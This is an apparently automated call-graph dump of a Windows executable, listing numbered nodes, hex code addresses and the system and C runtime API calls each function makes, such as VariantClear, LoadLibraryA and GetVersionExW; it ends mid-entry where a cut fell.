116 API calls 87835->87838 87839 44b1d8 87835->87839 87836->87835 87868 4321a4 87837->87868 87840 44b2db 87838->87840 87839->87276 87840->87837 87842 44b2e9 87840->87842 87844 44b2f6 87842->87844 87847 414a46 __fcloseall 82 API calls 87842->87847 87843 44b224 87845 44b253 87843->87845 87846 44b228 87843->87846 87844->87276 87872 43213d 87845->87872 87849 44b235 87846->87849 87851 414a46 __fcloseall 82 API calls 87846->87851 87847->87844 87852 414a46 __fcloseall 82 API calls 87849->87852 87855 44b245 87849->87855 87850 44b25a 87853 44b289 87850->87853 87856 44b260 87850->87856 87851->87849 87852->87855 87882 44b0bf 87 API calls 87853->87882 87855->87276 87857 44b26d 87856->87857 87859 414a46 __fcloseall 82 API calls 87856->87859 87860 44b27d 87857->87860 87862 414a46 __fcloseall 82 API calls 87857->87862 87858 44b28f 87883 4320f8 46 API calls _free 87858->87883 87859->87857 87860->87276 87862->87860 87863 44b295 87864 44b2a2 87863->87864 87865 414a46 __fcloseall 82 API calls 87863->87865 87866 44b2b2 87864->87866 87867 414a46 __fcloseall 82 API calls 87864->87867 87865->87864 87866->87276 87867->87866 87869 4321cb 87868->87869 87871 4321b4 __tzset_nolock _memmove 87868->87871 87870 414d04 __fread_nolock 61 API calls 87869->87870 87870->87871 87871->87843 87873 4135bb _malloc 46 API calls 87872->87873 87874 432150 87873->87874 87875 4135bb _malloc 46 API calls 87874->87875 87876 432162 87875->87876 87877 4135bb _malloc 46 API calls 87876->87877 87878 432174 87877->87878 87881 432189 87878->87881 87884 4320f8 46 API calls _free 87878->87884 87880 432198 87880->87850 87881->87850 87882->87858 87883->87863 87884->87880 87885->87178 87886->87181 87887->87199 87888->87199 87889->87199 87890->87190 87891->87199 87892->87199 87893->87203 87894->87212 87895->87214 87896->87214 87946 410160 87897->87946 87899 41012f GetFullPathNameW 87900 410147 moneypunct 87899->87900 87900->87033 87902 4102cb SHGetDesktopFolder 87901->87902 87905 410333 _wcsncpy 87901->87905 87903 4102e0 _wcsncpy 87902->87903 87902->87905 87904 41031c SHGetPathFromIDListW 87903->87904 87903->87905 87904->87905 87905->87037 87907 4101bb 87906->87907 87909 425f4a 87906->87909 87908 410160 52 API calls 87907->87908 87910 4101c7 87908->87910 87911 4114ab __wcsicoll 58 API calls 87909->87911 87914 425f6e 87909->87914 87950 410200 52 API calls 2 library calls 87910->87950 87911->87909 87913 4101d6 87951 410200 52 API calls 2 library calls 87913->87951 87914->87039 87916 4101e9 87916->87039 87918 40f760 128 API calls 87917->87918 87919 40f584 87918->87919 87920 429335 87919->87920 87921 40f58c 87919->87921 87924 4528bd 118 API calls 87920->87924 87922 40f598 87921->87922 87923 429358 87921->87923 87976 4033c0 113 API calls 7 library calls 87922->87976 87977 434034 86 API calls _wprintf 87923->87977 87926 42934b 87924->87926 87929 429373 87926->87929 87930 42934f 87926->87930 87928 40f5b4 87928->87036 87933 4115d7 52 API calls 87929->87933 87932 431e58 82 API calls 87930->87932 87931 429369 87931->87929 87932->87923 87943 4293c5 moneypunct 87933->87943 87934 42959c 87935 413748 _free 46 API calls 87934->87935 87936 4295a5 87935->87936 87937 431e58 82 API calls 87936->87937 87938 4295b1 87937->87938 87942 401b10 52 API calls 87942->87943 87943->87934 87943->87942 87952 444af8 87943->87952 87955 44b41c 87943->87955 87962 402780 87943->87962 87970 4022d0 87943->87970 87978 44c7dd 64 API calls 3 library calls 87943->87978 87947 410167 _wcslen 87946->87947 87948 4115d7 52 API calls 87947->87948 87949 41017e _wcscpy 87948->87949 87949->87899 87950->87913 87951->87916 87953 4115d7 52 API calls 87952->87953 87954 444b27 _memmove 87953->87954 87954->87943 87956 44b429 87955->87956 87957 4115d7 52 API calls 87956->87957 87958 44b440 87957->87958 87959 44b45e 87958->87959 87960 401b10 52 API calls 87958->87960 87959->87943 87961 44b453 87960->87961 87961->87943 87963 402827 87962->87963 87968 402790 moneypunct _memmove 87962->87968 87965 4115d7 52 API calls 87963->87965 87964 4115d7 52 API calls 87966 402797 87964->87966 87965->87968 87967 4115d7 52 API calls 87966->87967 87969 4027bd 87966->87969 87967->87969 87968->87964 87969->87943 87972 4022e0 87970->87972 87973 40239d 87970->87973 87971 402320 moneypunct 87971->87973 87975 4115d7 52 API calls 87971->87975 87972->87971 87972->87973 87974 4115d7 52 API calls 87972->87974 87973->87943 87974->87971 87975->87971 87976->87928 87977->87931 87978->87943 87980 402417 87979->87980 87984 402539 moneypunct 87979->87984 87981 4115d7 52 API calls 87980->87981 87980->87984 87982 402443 87981->87982 87983 4115d7 52 API calls 87982->87983 87985 4024b4 87983->87985 87984->87043 87985->87984 87987 4022d0 52 API calls 87985->87987 88008 402880 95 API calls 2 library calls 87985->88008 87987->87985 87992 401566 87988->87992 87989 401794 88009 40e9a0 90 API calls 87989->88009 87991 40167a 87995 4017c0 87991->87995 88010 45e737 90 API calls 3 library calls 87991->88010 87992->87989 87992->87991 87994 4010a0 52 API calls 87992->87994 87994->87992 87995->87045 87997 40bc70 52 API calls 87996->87997 88006 40d451 87997->88006 87998 40d50f 88013 410600 52 API calls 87998->88013 88000 427c01 88014 45e737 90 API calls 3 library calls 88000->88014 88001 40e0a0 52 API calls 88001->88006 88003 401b10 52 API calls 88003->88006 88004 40d519 88004->87048 88006->87998 88006->88000 88006->88001 88006->88003 88006->88004 88011 40f310 53 API calls 88006->88011 88012 40d860 91 API calls 88006->88012 88008->87985 88009->87991 88010->87995 88011->88006 88012->88006 88013->88004 88014->88004 88015->87061 88016->87062 88018 42c5fe 88017->88018 88033 4091c6 88017->88033 88019 40bc70 52 API calls 88018->88019 88018->88033 88020 42c64e InterlockedIncrement 88019->88020 88021 42c665 88020->88021 88026 42c697 88020->88026 88023 42c672 InterlockedDecrement Sleep InterlockedIncrement 88021->88023 88021->88026 88022 42c737 InterlockedDecrement 88024 42c74a 88022->88024 88023->88021 88023->88026 88027 408f40 VariantClear 88024->88027 88025 42c731 88025->88022 88026->88022 88026->88025 88310 408e80 88026->88310 88029 42c752 88027->88029 88323 410c60 VariantClear moneypunct 88029->88323 88033->87124 88034 42c6db 88035 402160 52 API calls 88034->88035 88036 42c6e5 88035->88036 88037 45340c 85 API calls 88036->88037 88038 42c6f1 88037->88038 88320 40d200 52 API calls 2 library calls 88038->88320 88040 42c6fb 88321 465124 53 API calls 88040->88321 88042 42c715 88043 42c76a 88042->88043 88044 42c719 88042->88044 88045 401b10 52 API calls 88043->88045 88322 46fe32 VariantClear 88044->88322 88047 42c77e 88045->88047 88048 401980 53 API calls 88047->88048 88049 42c796 88048->88049 88050 42c812 88049->88050 88054 42c864 88049->88054 88324 40ba10 88049->88324 88330 46fe32 VariantClear 88050->88330 88052 42c82a InterlockedDecrement 88331 46ff07 54 API calls 88052->88331 88332 45e737 90 API calls 3 library calls 88054->88332 88056 42c9ec 88375 47d33e 330 API calls 88056->88375 88061 408f40 VariantClear 88071 42c849 88061->88071 88063 408f40 VariantClear 88067 42c891 88063->88067 88064 402780 52 API calls 88064->88071 88333 410c60 VariantClear moneypunct 88067->88333 88070 401980 53 API calls 88070->88071 88071->88056 88071->88061 88071->88064 88071->88070 88334 40a780 88071->88334 88072 42c874 88072->88063 88074 42ca59 88072->88074 88074->88074 88076 40afc4 88075->88076 88077 40b156 88075->88077 88078 40afd5 88076->88078 88079 42d1e3 88076->88079 88387 45e737 90 API calls 3 library calls 88077->88387 88084 40a780 199 API calls 88078->88084 88100 40b11a moneypunct 88078->88100 88388 45e737 90 API calls 3 library calls 88079->88388 88082 40b143 88082->87124 88083 42d1f8 88088 408f40 VariantClear 88083->88088 88085 40b00a 88084->88085 88085->88083 88089 40b012 88085->88089 88087 42d4db 88087->88087 88088->88082 88090 40b04a 88089->88090 88092 42d231 VariantClear 88089->88092 88093 40b094 moneypunct 88089->88093 88094 40b05c moneypunct 88090->88094 88389 40e270 VariantClear moneypunct 88090->88389 88091 40b108 88091->88100 88390 40e270 VariantClear moneypunct 88091->88390 88092->88094 88093->88091 88098 42d425 moneypunct 88093->88098 88094->88093 88099 4115d7 52 API calls 88094->88099 88095 42d45a VariantClear 88095->88100 88098->88095 88098->88100 88099->88093 88100->88082 88391 45e737 90 API calls 3 library calls 88100->88391 88102 408fff 88101->88102 88115 40900d 88101->88115 88438 403ea0 52 API calls __cinit 88102->88438 88105 42c3f6 88441 45e737 90 API calls 3 library calls 88105->88441 88107 40a780 199 API calls 88107->88115 88108 42c44a 88443 45e737 90 API calls 3 library calls 88108->88443 88110 42c47b 88444 451b42 61 API calls 88110->88444 88112 42c4cb 88392 47faae 88112->88392 88113 42c564 88118 408f40 VariantClear 88113->88118 88115->88105 88115->88107 88115->88108 88115->88110 88115->88112 88115->88113 88117 42c548 88115->88117 88121 409112 88115->88121 88123 4090df 88115->88123 88125 42c528 88115->88125 88128 4090ea 88115->88128 88135 4090f2 moneypunct 88115->88135 88440 4534e3 52 API calls 88115->88440 88442 40c4e0 199 API calls 88115->88442 88448 45e737 90 API calls 3 library calls 88117->88448 88118->88135 88119 42c491 88119->88135 88445 45e737 90 API calls 3 library calls 88119->88445 88120 42c4da 88120->88135 88446 45e737 90 API calls 3 library calls 88120->88446 88121->88117 88130 40912b 88121->88130 88123->88128 88129 408e80 VariantClear 88123->88129 88447 45e737 90 API calls 3 library calls 88125->88447 88131 408f40 VariantClear 88128->88131 88129->88128 88130->88135 88439 403e10 53 API calls 88130->88439 88131->88135 88133 40914b 88134 408f40 VariantClear 88133->88134 88134->88135 88135->87124 88638 408d90 88136->88638 88138 429778 88664 410c60 VariantClear moneypunct 88138->88664 88140 429780 88141 408cf9 88141->88138 88142 42976c 88141->88142 88144 408d2d 88141->88144 88663 45e737 90 API calls 3 library calls 88142->88663 88654 403d10 88144->88654 88147 408d71 moneypunct 88147->87124 88148 408f40 VariantClear 88149 408d45 moneypunct 88148->88149 88149->88147 88149->88148 88151 40d15f 88150->88151 88153 425c87 88150->88153 88151->87124 88152 425cc7 88153->88152 88154 425ca1 TranslateAcceleratorW 88153->88154 88154->88151 88156 42602f 88155->88156 88159 40d17f 88155->88159 88156->87124 88157 42608e IsDialogMessageW 88158 40d18c 88157->88158 88157->88159 88158->87124 88159->88157 88159->88158 88878 430c46 GetClassLongW 88159->88878 88162 4096c6 _wcslen 88161->88162 88163 40a70c moneypunct _memmove 88162->88163 88164 4115d7 52 API calls 88162->88164 88166 4013a0 52 API calls 88163->88166 88165 4096fa _memmove 88164->88165 88167 4115d7 52 API calls 88165->88167 88168 4297aa 88166->88168 88169 40971b 88167->88169 88171 4115d7 52 API calls 88168->88171 88169->88163 88170 409749 CharUpperBuffW 88169->88170 88174 40976a moneypunct 88169->88174 88170->88174 88172 4297d1 _memmove 88171->88172 88905 45e737 90 API calls 3 library calls 88172->88905 88220 4097e5 moneypunct 88174->88220 88880 47dcbb 201 API calls 88174->88880 88176 408f40 VariantClear 88177 42ae92 88176->88177 88906 410c60 VariantClear moneypunct 88177->88906 88179 42aea4 88180 409aa2 88180->88172 88182 4115d7 52 API calls 88180->88182 88187 409afe 88180->88187 88181 40a689 88184 4115d7 52 API calls 88181->88184 88182->88187 88183 4115d7 52 API calls 88183->88220 88200 40a6af moneypunct _memmove 88184->88200 88185 409b2a 88189 429dbe 88185->88189 88247 409b4d moneypunct _memmove 88185->88247 88887 40b400 VariantClear VariantClear moneypunct 88185->88887 88186 40c2c0 52 API calls 88186->88220 88187->88185 88188 4115d7 52 API calls 88187->88188 88190 429d31 88188->88190 88195 429dd3 88189->88195 88888 40b400 VariantClear VariantClear moneypunct 88189->88888 88194 429d42 88190->88194 88884 44a801 52 API calls 88190->88884 88191 429a46 VariantClear 88191->88220 88192 409fd2 88197 40a045 88192->88197 88249 42a3f5 88192->88249 88204 40e0a0 52 API calls 88194->88204 88195->88247 88889 40e1c0 VariantClear moneypunct 88195->88889 88202 4115d7 52 API calls 88197->88202 88198 408f40 VariantClear 88198->88220 88206 4115d7 52 API calls 88200->88206 88207 40a04c 88202->88207 88208 429d57 88204->88208 88206->88163 88212 40a0a7 88207->88212 88215 4091e0 316 API calls 88207->88215 88885 453443 52 API calls 88208->88885 88209 40ba10 52 API calls 88209->88220 88210 42a42f 88893 45e737 90 API calls 3 library calls 88210->88893 88233 40a0af 88212->88233 88894 40c790 VariantClear moneypunct 88212->88894 88213 4299d9 88217 408f40 VariantClear 88213->88217 88215->88212 88216 429abd 88216->87124 88221 4299e2 88217->88221 88218 429d88 88886 453443 52 API calls 88218->88886 88220->88172 88220->88180 88220->88181 88220->88183 88220->88186 88220->88191 88220->88198 88220->88200 88220->88209 88220->88213 88220->88216 88226 40a780 199 API calls 88220->88226 88229 42a452 88220->88229 88881 40c4e0 199 API calls 88220->88881 88883 40e270 VariantClear moneypunct 88220->88883 88882 410c60 VariantClear moneypunct 88221->88882 88226->88220 88227 402780 52 API calls 88227->88247 88229->88176 88230 408f40 VariantClear 88261 40a162 moneypunct _memmove 88230->88261 88231 4115d7 52 API calls 88231->88247 88232 41130a 51 API calls __cinit 88232->88247 88234 40a11b 88233->88234 88236 42a4b4 VariantClear 88233->88236 88233->88261 88241 40a12d moneypunct 88234->88241 88895 40e270 VariantClear moneypunct 88234->88895 88235 40a780 199 API calls 88235->88247 88236->88241 88237 401980 53 API calls 88237->88247 88238 408e80 VariantClear 88238->88247 88240 4115d7 52 API calls 88240->88261 88241->88240 88241->88261 88242 408e80 VariantClear 88242->88261 88244 44a801 52 API calls 88244->88247 88245 42a74d VariantClear 88245->88261 88246 40a368 88248 42aad4 88246->88248 88256 40a397 88246->88256 88247->88163 88247->88192 88247->88210 88247->88227 88247->88231 88247->88232 88247->88235 88247->88237 88247->88238 88247->88244 88247->88249 88254 409c95 88247->88254 88890 45f508 52 API calls 88247->88890 88891 403e10 53 API calls 88247->88891 88898 46fe90 VariantClear VariantClear moneypunct 88248->88898 88892 47390f VariantClear 88249->88892 88250 42a886 VariantClear 88250->88261 88251 42a7e4 VariantClear 88251->88261 88252 40a3ce 88265 40a3d9 moneypunct 88252->88265 88899 40b400 VariantClear VariantClear moneypunct 88252->88899 88254->87124 88255 40e270 VariantClear 88255->88261 88256->88252 88281 40a42c moneypunct 88256->88281 88879 40b400 VariantClear VariantClear moneypunct 88256->88879 88259 42abaf 88263 42abd4 VariantClear 88259->88263 88272 40a4ee moneypunct 88259->88272 88260 4115d7 52 API calls 88264 42a5a6 VariantInit VariantCopy 88260->88264 88261->88230 88261->88242 88261->88245 88261->88246 88261->88248 88261->88250 88261->88251 88261->88255 88261->88260 88268 4115d7 52 API calls 88261->88268 88896 470870 52 API calls 88261->88896 88897 44ccf1 VariantClear moneypunct 88261->88897 88262 40a4dc 88262->88272 88901 40e270 VariantClear moneypunct 88262->88901 88263->88272 88264->88261 88267 42a5c6 VariantClear 88264->88267 88266 40a41a 88265->88266 88274 42ab44 VariantClear 88265->88274 88265->88281 88266->88281 88900 40e270 VariantClear moneypunct 88266->88900 88267->88261 88268->88261 88269 42ac4f 88275 42ac79 VariantClear 88269->88275 88279 40a546 moneypunct 88269->88279 88272->88269 88273 40a534 88272->88273 88273->88279 88902 40e270 VariantClear moneypunct 88273->88902 88274->88281 88275->88279 88276 42ad28 88282 42ad4e VariantClear 88276->88282 88287 40a583 moneypunct 88276->88287 88279->88276 88280 40a571 88279->88280 88280->88287 88903 40e270 VariantClear moneypunct 88280->88903 88281->88259 88281->88262 88282->88287 88284 40a650 moneypunct 88284->87124 88285 42ae0e VariantClear 88285->88287 88287->88284 88287->88285 88904 40e270 VariantClear moneypunct 88287->88904 88288->87124 88289->87072 88290->87077 88291->87124 88292->87124 88293->87124 88294->87124 88295->87129 88296->87129 88297->87129 88298->87129 88299->87129 88300->87129 88301->87129 88303 403cdf 88302->88303 88304 408f40 VariantClear 88303->88304 88305 403ce7 88304->88305 88305->87117 88306->87129 88307->87129 88308->87124 88309->87069 88311 408e88 88310->88311 88313 408e94 88310->88313 88312 408f40 VariantClear 88311->88312 88312->88313 88314 45340c 88313->88314 88315 453439 88314->88315 88316 453419 88314->88316 88315->88034 88317 45342f 88316->88317 88377 4531b1 85 API calls 5 library calls 88316->88377 88317->88034 88319 453425 88319->88034 88320->88040 88321->88042 88322->88025 88323->88033 88325 40ba49 88324->88325 88326 40ba1b moneypunct _memmove 88324->88326 88328 4115d7 52 API calls 88325->88328 88327 4115d7 52 API calls 88326->88327 88329 40ba22 88327->88329 88328->88326 88329->88049 88330->88052 88331->88071 88332->88072 88333->88033 88335 40a7a6 88334->88335 88336 40ae8c 88334->88336 88377->88319 88387->88079 88388->88083 88389->88094 88390->88100 88391->88087 88393 408e80 VariantClear 88392->88393 88400 47fb02 88393->88400 88396 47fc59 88398 40a780 199 API calls 88396->88398 88402 47fc6a 88398->88402 88399 47fc2b 88401 408f40 VariantClear 88399->88401 88400->88396 88400->88399 88415 47fcd4 88400->88415 88419 408e80 VariantClear 88400->88419 88425 408f40 VariantClear 88400->88425 88432 47fc1d 88400->88432 88449 475a67 88400->88449 88477 47b291 88400->88477 88488 46fe32 VariantClear 88400->88488 88403 47fc33 88401->88403 88402->88399 88404 47fc7d 88402->88404 88405 47fc8c 88402->88405 88406 408f40 VariantClear 88403->88406 88491 45e737 90 API calls 3 library calls 88404->88491 88408 40ba10 52 API calls 88405->88408 88409 47fc3b 88406->88409 88410 47fc98 88408->88410 88411 408f40 VariantClear 88409->88411 88492 47b2f4 144 API calls 88410->88492 88413 47fc43 88411->88413 88490 410c60 VariantClear moneypunct 88413->88490 88414 47fca7 88418 408f40 VariantClear 88414->88418 88417 408f40 VariantClear 88415->88417 88421 47fcdc 88417->88421 88422 47fcb1 88418->88422 88419->88400 88420 47fc4b 88420->88120 88423 408f40 VariantClear 88421->88423 88424 408f40 VariantClear 88422->88424 88426 47fce4 88423->88426 88427 47fcb9 88424->88427 88425->88400 88428 408f40 VariantClear 88426->88428 88429 408f40 VariantClear 88427->88429 88430 47fcec 88428->88430 88431 47fcc1 88429->88431 88494 410c60 VariantClear moneypunct 88430->88494 88493 410c60 VariantClear moneypunct 88431->88493 88489 45e538 90 API calls 3 library calls 88432->88489 88435 47fcc9 88435->88120 88437 47fcf4 88437->88120 88438->88115 88439->88133 88440->88115 88441->88135 88442->88115 88443->88135 88444->88119 88445->88135 88446->88135 88447->88135 88448->88113 88450 475ae5 88449->88450 88454 475ac5 88449->88454 88495 45e737 90 API calls 3 library calls 88450->88495 88452 475afe 88453 408f40 VariantClear 88452->88453 88459 475b06 88453->88459 88454->88450 88455 475b42 88454->88455 88456 402780 52 API calls 88454->88456 88457 402780 52 API calls 88455->88457 88456->88454 88469 475b60 88457->88469 88458 475c7c 88460 408f40 VariantClear 88458->88460 88459->88400 88461 475c84 88460->88461 88461->88400 88462 40c2c0 52 API calls 88462->88469 88463 40a780 199 API calls 88463->88469 88464 475cc7 88466 408f40 VariantClear 88464->88466 88465 40ba10 52 API calls 88465->88469 88471 475ca8 88466->88471 88467 408f40 VariantClear 88467->88469 88468 475cd5 88497 45e737 90 API calls 3 library calls 88468->88497 88469->88458 88469->88462 88469->88463 88469->88464 88469->88465 88469->88467 88469->88468 88474 475ca0 88469->88474 88496 40c4e0 199 API calls 88469->88496 88471->88400 88473 475ce8 88475 408f40 VariantClear 88473->88475 88476 408f40 VariantClear 88474->88476 88475->88471 88476->88471 88478 47b2e7 88477->88478 88479 47b2a5 88477->88479 88478->88400 88498 40e710 88479->88498 88482 47b2b7 88509 47974b 88482->88509 88483 47b2cf 88485 47974b 144 API calls 88483->88485 88487 47b2df 88485->88487 88486 47b2c7 88486->88400 88487->88400 88488->88400 88489->88399 88490->88420 88491->88399 88492->88414 88493->88435 88494->88437 88495->88452 88496->88469 88497->88473 88499 408f40 VariantClear 88498->88499 88500 40e71b 88499->88500 88501 4115d7 52 API calls 88500->88501 88502 40e729 88501->88502 88503 426bdc 88502->88503 88505 40e734 88502->88505 88504 426be7 88503->88504 88506 40bc70 52 API calls 88503->88506 88505->88504 88507 401b10 52 API calls 88505->88507 88506->88504 88508 40e743 88507->88508 88508->88482 88508->88483 88510 479786 88509->88510 88511 479aed 88509->88511 88510->88511 88513 479798 88510->88513 88578 451b42 61 API calls 88511->88578 88515 4797a2 88513->88515 88516 4797be 88513->88516 88514 479b00 88514->88486 88571 451b42 61 API calls 88515->88571 88518 4797c7 88516->88518 88519 4797e3 88516->88519 88572 451b42 61 API calls 88518->88572 88549 441eba 88519->88549 88521 4797b5 88521->88486 88523 4797f7 88525 479815 88523->88525 88526 4797fe 88523->88526 88524 4797da 88524->88486 88528 47983c 88525->88528 88554 451d2b 88525->88554 88573 451b42 61 API calls 88526->88573 88534 4798e6 88528->88534 88565 479714 88528->88565 88529 47980c 88529->88486 88531 47994b VariantInit 88538 479980 _memcpy_s 88531->88538 88534->88531 88535 479916 VariantClear 88534->88535 88535->88534 88550 441f12 88549->88550 88551 441ecc _wcslen 88549->88551 88550->88523 88551->88550 88552 410160 52 API calls 88551->88552 88553 441ede 88552->88553 88553->88523 88555 451d5e 88554->88555 88556 451e93 SysFreeString 88555->88556 88557 451d68 88555->88557 88563 451f21 88555->88563 88564 451ea0 88555->88564 88556->88564 88557->88528 88558 451f6d lstrcmpiW 88559 451f7f SysFreeString 88558->88559 88559->88563 88562 451fab 88562->88528 88563->88558 88563->88559 88563->88562 88563->88564 88564->88557 88579 44a545 RaiseException 88564->88579 88566 479728 88565->88566 88580 479500 VariantInit 88566->88580 88571->88521 88572->88524 88573->88529 88578->88514 88579->88564 88639 4289d2 88638->88639 88640 408db3 88638->88640 88669 45e737 90 API calls 3 library calls 88639->88669 88665 40bec0 88640->88665 88643 4289e5 88670 45e737 90 API calls 3 library calls 88643->88670 88644 408e5a 88644->88141 88646 40ba10 52 API calls 88652 408dc9 88646->88652 88647 428a05 88648 408f40 VariantClear 88647->88648 88648->88644 88649 40a780 199 API calls 88649->88652 88650 408e64 88651 408f40 VariantClear 88650->88651 88651->88644 88652->88643 88652->88644 88652->88646 88652->88647 88652->88649 88652->88650 88653 408f40 VariantClear 88652->88653 88653->88652 88655 408f40 VariantClear 88654->88655 88656 403d20 88655->88656 88657 403cd0 VariantClear 88656->88657 88658 403d4d 88657->88658 88672 46f8cb 88658->88672 88691 477145 88658->88691 88696 4755ad 88658->88696 88659 403d76 88659->88138 88659->88149 88663->88138 88664->88140 88666 40bed0 88665->88666 88667 40bef2 88666->88667 88671 45e737 90 API calls 3 library calls 88666->88671 88667->88652 88669->88643 88670->88647 88671->88667 88673 46f8e7 88672->88673 88674 46f978 88672->88674 88675 46f900 88673->88675 88676 46f8ee 88673->88676 88677 46f93c 88673->88677 88678 46f91a 88673->88678 88674->88659 88679 45340c 85 API calls 88675->88679 88683 45340c 85 API calls 88676->88683 88681 45340c 85 API calls 88677->88681 88680 45340c 85 API calls 88678->88680 88679->88676 88684 46f931 88680->88684 88682 46f958 88681->88682 88685 45340c 85 API calls 88682->88685 88686 46f971 88683->88686 88687 45340c 85 API calls 88684->88687 88688 46f95f 88685->88688 88699 46cb5f 88686->88699 88687->88676 88690 45340c 85 API calls 88688->88690 88690->88676 88692 408e80 VariantClear 88691->88692 88693 47715a 88692->88693 88749 467ac4 88693->88749 88695 477160 88695->88659 88772 475077 88696->88772 88698 4755c0 88698->88659 88700 40bc70 52 API calls 88699->88700 88701 46cb7e 88700->88701 88702 40bc70 52 API calls 88701->88702 88703 46cb86 88702->88703 88704 40bc70 52 API calls 88703->88704 88705 46cb91 88704->88705 88706 408f40 VariantClear 88705->88706 88707 46cbaf 88706->88707 88708 46cbd4 CLSIDFromProgID 88707->88708 88709 46cbc5 OleInitialize 88707->88709 88711 46cbe9 CLSIDFromString 88708->88711 88709->88708 88750 467bb8 88749->88750 88751 467adc 88749->88751 88750->88695 88752 467c16 88751->88752 88753 467b90 88751->88753 88754 467c1d 88751->88754 88762 467aed 88751->88762 88771 40e270 VariantClear moneypunct 88752->88771 88757 4115d7 52 API calls 88753->88757 88756 4115d7 52 API calls 88754->88756 88768 467b75 _memmove 88756->88768 88757->88768 88758 467b55 88760 4115d7 52 API calls 88758->88760 88759 4115d7 52 API calls 88759->88750 88761 467b5b 88760->88761 88769 442ee0 52 API calls 88761->88769 88764 4115d7 52 API calls 88762->88764 88767 467b28 moneypunct 88762->88767 88764->88767 88765 467b6b 88770 45f645 54 API calls moneypunct 88765->88770 88767->88754 88767->88758 88767->88768 88768->88759 88769->88765 88770->88768 88771->88754 88825 4533eb 88772->88825 88775 4750ee 88777 408f40 VariantClear 88775->88777 88776 475129 88829 4646e0 88776->88829 88783 4750f5 88777->88783 88779 47515e 88780 475162 88779->88780 88813 47518e 88779->88813 88782 408f40 VariantClear 88780->88782 88781 475357 88783->88698 88791 4533eb 85 API calls 88791->88813 88801 475480 88803 408f40 VariantClear 88801->88803 88811 4754b5 88813->88781 88813->88791 88813->88801 88813->88811 88861 436299 52 API calls 2 library calls 88813->88861 88862 463ad5 64 API calls __wcsicoll 88813->88862 88826 453404 88825->88826 88827 4533f8 88825->88827 88826->88775 88826->88776 88827->88826 88872 4531b1 85 API calls 5 library calls 88827->88872 88873 4536f7 53 API calls 88829->88873 88831 4646fc 88874 4426cd 59 API calls _wcslen 88831->88874 88833 464711 88835 40bc70 52 API calls 88833->88835 88841 46474b 88833->88841 88836 46472c 88835->88836 88875 461465 52 API calls _memmove 88836->88875 88838 464793 88838->88779 88839 464741 88840 40c600 52 API calls 88839->88840 88840->88841 88841->88838 88876 463ad5 64 API calls __wcsicoll 88841->88876 88861->88813 88862->88813 88872->88826 88873->88831 88874->88833 88875->88839 88876->88838 88878->88159 88879->88252 88880->88174 88881->88220 88882->88284 88883->88220 88884->88194 88885->88218 88886->88185 88887->88189 88888->88195 88889->88247 88890->88247 88891->88247 88892->88210 88893->88229 88894->88212 88895->88241 88896->88261 88897->88261 88898->88252 88899->88265 88900->88281 88901->88272 88902->88279 88903->88287 88904->88287 88905->88229 88906->88179 88907 42d154 88911 480a8d 88907->88911 88909 42d161 88910 480a8d 199 API calls 88909->88910 88910->88909 88912 480ae4 88911->88912 88913 480b26 88911->88913 88914 480aeb 88912->88914 88915 480b15 88912->88915 88916 40bc70 52 API calls 88913->88916 88917 480aee 88914->88917 88918 480b04 88914->88918 88944 4805bf 199 API calls 88915->88944 88936 480b2e 88916->88936 88917->88913 88920 480af3 88917->88920 88943 47fea2 199 API calls __itow_s 88918->88943 88942 47f135 199 API calls 88920->88942 88922 40e0a0 52 API calls 88922->88936 88925 408f40 VariantClear 88927 481156 88925->88927 88926 480aff 88926->88925 88928 408f40 VariantClear 88927->88928 88929 48115e 88928->88929 88929->88909 88930 40e710 53 API calls 88930->88936 88931 401980 53 API calls 88931->88936 88933 40c2c0 52 API calls 88933->88936 88934 40a780 199 API calls 88934->88936 88935 408e80 VariantClear 88935->88936 88936->88922 88936->88926 88936->88930 88936->88931 88936->88933 88936->88934 88936->88935 88940 480ff5 88936->88940 88945 45377f 52 API calls 88936->88945 88946 45e951 53 API calls 88936->88946 88947 40e830 53 API calls 88936->88947 88948 47925f 53 API calls 88936->88948 88949 47fcff 199 API calls 88936->88949 88950 45e737 90 API calls 3 library calls 88940->88950 88942->88926 88943->88926 88944->88926 88945->88936 88946->88936 88947->88936 88948->88936 88949->88936 88950->88926 88951 42b14b 88958 40bc10 88951->88958 88953 42b159 88954 4096a0 330 API calls 88953->88954 88955 42b177 88954->88955 88969 44b92d VariantClear 88955->88969 88957 42bc5b 88959 40bc24 88958->88959 88960 40bc17 88958->88960 88962 40bc2a 88959->88962 88963 40bc3c 88959->88963 88961 408e80 VariantClear 88960->88961 88965 40bc1f 88961->88965 88966 408e80 VariantClear 88962->88966 88964 4115d7 52 API calls 88963->88964 88968 40bc43 88964->88968 88965->88953 88967 40bc33 88966->88967 88967->88953 88968->88953 88969->88957 88970 425b2b 88975 40f000 88970->88975 88974 425b3a 88976 4115d7 52 API calls 88975->88976 88977 40f007 88976->88977 88978 4276ea 88977->88978 88984 40f030 88977->88984 88983 41130a 51 API calls __cinit 88983->88974 88985 40f039 88984->88985 88986 40f01a 88984->88986 89014 41130a 51 API calls __cinit 88985->89014 88988 40e500 88986->88988 88989 40bc70 52 API calls 88988->88989 88990 40e515 GetVersionExW 88989->88990 88991 402160 52 API calls 88990->88991 88992 40e557 88991->88992 89015 40e660 88992->89015 88999 427674 89001 4276c6 GetSystemInfo 88999->89001 89000 40e5cd GetCurrentProcess 89036 40ef20 LoadLibraryA GetProcAddress 89000->89036 89003 4276d5 GetSystemInfo 89001->89003 89004 40e5e0 89004->89003 89029 40efd0 89004->89029 89007 40e629 89033 40ef90 89007->89033 89010 40e641 FreeLibrary 89011 40e644 89010->89011 89012 40e653 FreeLibrary 89011->89012 89013 40e656 89011->89013 89012->89013 89013->88983 89014->88986 89016 40e667 89015->89016 89017 42761d 89016->89017 89018 40c600 52 API calls 89016->89018 89019 40e55c 89018->89019 89020 40e680 89019->89020 89021 40e687 89020->89021 89022 427616 89021->89022 89023 40c600 52 API calls 89021->89023 89024 40e566 89023->89024 89024->88999 89025 40ef60 89024->89025 89026 40e5c8 89025->89026 89027 40ef66 LoadLibraryA 89025->89027 89026->89000 89026->89004 89027->89026 89028 40ef77 GetProcAddress 89027->89028 89028->89026 89030 40e620 89029->89030 89031 40efd6 LoadLibraryA 89029->89031 89030->89001 89030->89007 89031->89030 89032 40efe7 GetProcAddress 89031->89032 89032->89030 89037 40efb0 LoadLibraryA GetProcAddress 89033->89037 89035 40e632 GetNativeSystemInfo 89035->89010 89035->89011 89036->89004 89037->89035 89038 425b5e 89043 40c7f0 89038->89043 89042 425b6d 89078 40db10 52 API calls 89043->89078 89045 40c82a 89079 410ab0 6 API calls 89045->89079 89047 40c86d 89048 40bc70 52 API calls 89047->89048 89049 